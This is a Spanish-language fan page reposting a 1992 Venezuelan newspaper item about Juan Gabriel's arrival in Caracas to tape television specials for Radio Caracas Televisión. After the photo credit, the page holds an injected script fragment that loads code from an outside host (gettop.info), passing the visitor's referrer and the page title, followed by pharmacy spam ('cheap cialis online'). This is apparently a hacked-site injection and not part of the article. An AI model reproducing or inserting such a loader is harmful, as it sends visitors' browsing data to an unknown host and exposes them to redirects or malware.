Llego Juan Gabriel

Comparte !

Con nuevo repertorio y muchísimas expectativas ante el público venezolano, llegó el 22 de septiembre el astro mexicano Juan Gabriel, artista exclusivo de Radio Caracas Televisión, canal con el que grabará varios programas musicales.

Acompañado de una orquesta aun mayor a la del año pasado, cuando su presencia en Caracas fue todo un acontecimiento, no sólo por su impacto y su arrase en el público, sino también por la polémica suscitada con el robo de sus instrumentos, Juan Gabriel trae un show inédito en nuestro país y nuevos temas, entre los que incluye uno dedicado a Maracaibo, Puerto la cruz y Valencia.

Juan Gabriel Club de FansSin embargo, el cantautor azteca no quiso adelantar ningún otro detalle de su nueva presentación en Venezuela, tal como se lo hizo saber a Carmen Victoria Pérez y Nelson Bustamante, en la entrevista que recientemente considera en la ciudad norteamericana de Santa Fe, y la cual se transmitió el sábado 19 en horario estelar.

Los programas especiales de Juan Gabriel tendrán lugar, el lunes 28 de septiembre en el Teatro La Campiña, y serán dirigidos por Orlando González y producidos por este último y Mirella Parisca, con la supervisión de Hugo Carregal, gerente de Variedades del Canal de Quinta Crespo. Entre su llegada y la grabación de los especiales, el artista azteca hará una gira por Valencia y Juan Griego y ensayará para su presentación televisiva. Juan Gabriel en Venezuela.

(Noticia publicada en el mes de septiembre de 1992 en Diario Meridiano, Venezuela) 

Foto enviada por Aldemaro E. Gonzalez Mosqueras.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; cheap cialis online

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

shares